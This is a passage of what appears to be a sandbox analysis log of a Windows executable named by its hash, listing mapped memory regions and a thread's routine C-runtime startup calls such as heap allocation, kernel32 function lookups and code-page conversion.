0x736f0d9e region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\SysWOW64\\propsys.dll" (normalized: "c:\\windows\\syswow64\\propsys.dll") Region: id = 900 start_va = 0x7efa1000 end_va = 0x7efa3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efa1000" filename = "" Region: id = 901 start_va = 0x710000 end_va = 0x711fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000710000" filename = "" Region: id = 902 start_va = 0x2650000 end_va = 0x2650fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002650000" filename = "" Region: id = 903 start_va = 0x2670000 end_va = 0x2673fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 904 start_va = 0x2f20000 end_va = 0x2f45fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000a.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000a.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000a.db") Region: id = 905 start_va = 0x2680000 end_va = 0x2680fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002680000" filename = "" Region: id = 906 start_va = 0x2f50000 end_va = 0x3050fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002f50000" filename = "" Region: id = 907 start_va = 0x2f50000 end_va = 0x3050fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002f50000" filename = "" Region: id = 908 start_va = 0x2f50000 end_va = 0x3050fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002f50000" filename = "" Region: id = 909 start_va = 0x2670000 end_va = 0x2673fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 910 start_va = 0x2f50000 end_va = 0x2f7ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000015.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000015.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000015.db") Region: id = 911 start_va = 0x2690000 end_va = 0x2693fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 912 start_va = 0x2f80000 end_va = 0x2fe5fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db") Region: id = 913 start_va = 0x27b0000 end_va = 0x27bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "propsys.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\propsys.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\propsys.dll.mui") Region: id = 914 start_va = 0x27c0000 end_va = 0x27fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000027c0000" filename = "" Region: id = 915 start_va = 0x759d0000 end_va = 0x75b6cfff monitored = 0 entry_point = 0x759d17e7 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\SysWOW64\\setupapi.dll" (normalized: "c:\\windows\\syswow64\\setupapi.dll") Region: id = 916 start_va = 0x758a0000 end_va = 0x758c6fff monitored = 0 entry_point = 0x758a58b9 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 917 start_va = 0x75b70000 end_va = 0x75b81fff monitored = 0 entry_point = 0x75b71441 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\SysWOW64\\devobj.dll" (normalized: "c:\\windows\\syswow64\\devobj.dll") Region: id = 918 start_va = 0x2940000 end_va = 0x294cfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "setupapi.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\setupapi.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\setupapi.dll.mui") Thread: id = 2 os_tid = 0xea4 [0083.172] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff78 | out: lpSystemTimeAsFileTime=0x18ff78*(dwLowDateTime=0xa01dffa0, dwHighDateTime=0x1d8a8d3)) [0083.172] GetCurrentThreadId () returned 0xea4 [0083.172] GetCurrentProcessId () returned 0xea0 [0083.172] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff70 | out: lpPerformanceCount=0x18ff70*=2074230118719) returned 1 [0083.212] GetStartupInfoW (in: lpStartupInfo=0x18ff08 | out: lpStartupInfo=0x18ff08*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\kEecfMwgj\\Desktop\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x76f1fd35, hStdError=0x76f87daf)) [0083.262] GetProcessHeap () returned 0x720000 [0083.518] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x752b0000 [0083.518] GetProcAddress (hModule=0x752b0000, lpProcName="FlsAlloc") returned 0x752c4ee3 [0083.518] GetProcAddress (hModule=0x752b0000, lpProcName="FlsFree") returned 0x752c354f [0083.518] GetProcAddress (hModule=0x752b0000, lpProcName="FlsGetValue") returned 0x752c1252 [0083.519] GetProcAddress (hModule=0x752b0000, lpProcName="FlsSetValue") returned 0x752c41c0 [0083.519] GetProcAddress (hModule=0x752b0000, lpProcName="InitializeCriticalSectionEx") returned 0x752c4ce0 [0083.519] GetProcAddress (hModule=0x752b0000, lpProcName="CreateEventExW") returned 0x753446ab [0083.519] GetProcAddress (hModule=0x752b0000, lpProcName="CreateSemaphoreExW") returned 0x75344735 [0083.519] GetProcAddress (hModule=0x752b0000, lpProcName="SetThreadStackGuarantee") returned 0x752cd2d7 [0083.519] GetProcAddress (hModule=0x752b0000, lpProcName="CreateThreadpoolTimer") returned 0x752dee4e [0083.519] GetProcAddress (hModule=0x752b0000, lpProcName="SetThreadpoolTimer") returned 0x76f4441c [0083.519] GetProcAddress (hModule=0x752b0000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x76f6c50e [0083.519] GetProcAddress (hModule=0x752b0000, lpProcName="CloseThreadpoolTimer") returned 0x76f6c381 [0083.519] GetProcAddress (hModule=0x752b0000, lpProcName="CreateThreadpoolWait") returned 0x752df058 [0083.520] GetProcAddress (hModule=0x752b0000, lpProcName="SetThreadpoolWait") returned 0x76f505d7 [0083.520] GetProcAddress (hModule=0x752b0000, lpProcName="CloseThreadpoolWait") returned 0x76f6ca24 [0083.520] GetProcAddress (hModule=0x752b0000, lpProcName="FlushProcessWriteBuffers") returned 0x76f20b8c [0083.520] GetProcAddress (hModule=0x752b0000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x76fdfde8 [0083.520] GetProcAddress (hModule=0x752b0000, lpProcName="GetCurrentProcessorNumber") returned 0x76f71e1d [0083.520] GetProcAddress (hModule=0x752b0000, lpProcName="GetLogicalProcessorInformation") returned 0x75344d01 [0083.520] GetProcAddress (hModule=0x752b0000, lpProcName="CreateSymbolicLinkW") returned 0x7533d181 [0083.520] GetProcAddress (hModule=0x752b0000, lpProcName="SetDefaultDllDirectories") returned 0x753d208a [0083.520] GetProcAddress (hModule=0x752b0000, lpProcName="EnumSystemLocalesEx") returned 0x753447ef [0083.521] GetProcAddress (hModule=0x752b0000, lpProcName="CompareStringEx") returned 0x75344c51 [0083.521] GetProcAddress (hModule=0x752b0000, lpProcName="GetDateFormatEx") returned 0x75356c26 [0083.521] GetProcAddress (hModule=0x752b0000, lpProcName="GetLocaleInfoEx") returned 0x75344cf1 [0083.521] GetProcAddress (hModule=0x752b0000, lpProcName="GetTimeFormatEx") returned 0x75356ba1 [0083.521] GetProcAddress (hModule=0x752b0000, lpProcName="GetUserDefaultLocaleName") returned 0x75344d61 [0083.521] GetProcAddress (hModule=0x752b0000, lpProcName="IsValidLocaleName") returned 0x75344d81 [0083.521] GetProcAddress (hModule=0x752b0000, lpProcName="LCMapStringEx") returned 0x75344d91 [0083.521] GetProcAddress (hModule=0x752b0000, lpProcName="GetCurrentPackageId") returned 0x0 [0083.522] GetProcAddress (hModule=0x752b0000, lpProcName="GetTickCount64") returned 0x752deeb0 [0083.522] GetProcAddress (hModule=0x752b0000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0083.522] GetProcAddress (hModule=0x752b0000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0083.522] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x3bc) returned 0x73f1c8 [0083.523] GetCurrentThreadId () returned 0xea4 [0083.550] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x0, Size=0x18) returned 0x7319a0 [0083.550] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x800) returned 0x73f590 [0083.550] GetStartupInfoW (in: lpStartupInfo=0x18fed8 | out: lpStartupInfo=0x18fed8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\kEecfMwgj\\Desktop\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x425128, hStdOutput=0x507a8f16, hStdError=0x0)) [0083.550] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0083.551] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0083.551] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0083.551] GetCommandLineW () returned="\"C:\\Users\\kEecfMwgj\\Desktop\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe\" " [0083.551] GetEnvironmentStringsW () returned 0x73fd98* [0083.551] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x0, Size=0xb0e) returned 0x7408b0 [0083.579] FreeEnvironmentStringsW (penv=0x73fd98) returned 1 [0083.625] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x511130, nSize=0x104 | out: lpFilename="C:\\Users\\kEecfMwgj\\Desktop\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe")) returned 0x5f [0083.663] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x0, Size=0xc8) returned 0x73fd98 [0083.711] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x98) returned 0x73fe68 [0083.711] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x3e) returned 0x7323e8 [0083.712] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x56) returned 0x73ff08 [0083.712] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x6e) returned 0x73ff68 [0083.712] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x78) returned 0x72fb38 [0083.712] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x62) returned 0x73ffe0 [0083.712] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x30) returned 0x73b278 [0083.712] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x48) returned 0x736d90 [0083.712] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x28) returned 0x73ac70 [0083.712] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x1a) returned 0x73ea80 [0083.712] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x34) returned 0x7319c0 [0083.712] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x5c) returned 0x740050 [0083.712] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x32) returned 0x7400b8 [0083.712] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x2e) returned 0x73b2b0 [0083.712] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x1c) returned 0x73eaa8 [0083.712] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x12a) returned 0x7400f8 [0083.712] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x7c) returned 0x740230 [0083.712] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x36) returned 0x7402b8 [0083.712] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x3a) returned 0x732430 [0083.712] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x90) returned 0x7402f8 [0083.712] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x24) returned 0x73aca0 [0083.712] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x30) returned 0x73b2e8 [0083.712] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x36) returned 0x740390 [0083.712] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x48) returned 0x736de0 [0083.712] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x52) returned 0x7403d0 [0083.712] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x3c) returned 0x732478 [0083.712] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0xd6) returned 0x740430 [0083.712] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x2e) returned 0x73b320 [0083.713] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x1e) returned 0x73ead0 [0083.713] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x2c) returned 0x73b358 [0083.713] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x54) returned 0x740510 [0083.713] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x52) returned 0x740570 [0083.713] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x2c) returned 0x73b390 [0083.713] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x26) returned 0x73acd0 [0083.713] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x3e) returned 0x7324c0 [0083.713] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x24) returned 0x73ad00 [0083.713] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x30) returned 0x73b3c8 [0083.713] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x8c) returned 0x7405d0 [0083.713] HeapFree (in: hHeap=0x720000, dwFlags=0x0, lpMem=0x7408b0 | out: hHeap=0x720000) returned 1 [0083.761] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x800) returned 0x740668 [0083.787] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x80) returned 0x740e70 [0083.821] GetLastError () returned 0x0 [0083.821] SetLastError (dwErrCode=0x0) [0083.821] GetLastError () returned 0x0 [0083.821] SetLastError (dwErrCode=0x0) [0083.821] GetLastError () returned 0x0 [0083.821] SetLastError (dwErrCode=0x0) [0083.822] GetACP () returned 0x4e4 [0083.822] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x0, Size=0x220) returned 0x740ef8 [0083.822] GetLastError () returned 0x0 [0083.822] SetLastError (dwErrCode=0x0) [0083.822] IsValidCodePage (CodePage=0x4e4) returned 1 [0083.822] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fecc | out: lpCPInfo=0x18fecc) returned 1 [0083.828] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f994 | out: lpCPInfo=0x18f994) returned 1 [0083.835] GetLastError () returned 0x0 [0083.835] SetLastError (dwErrCode=0x0) [0083.835] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0083.843] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f718, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0083.843] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f9a8 | out: lpCharType=0x18f9a8) returned 1 [0083.851] GetLastError () returned 0x0 [0083.851] SetLastError (dwErrCode=0x0) [0083.851] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0083.851] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f6e8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0083.862] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0083.862] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4d8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0083.862] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x18fca8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x86\x8ezPäþ\x18", lpUsedDefaultChar=0x0) returned 256 [0083.862] GetLastError () returned 0x0 [0083.862] SetLastError (dwErrCode=0x0) [0083.863] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0083.864] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f6f8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0083.864] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0083.864] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4e8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" 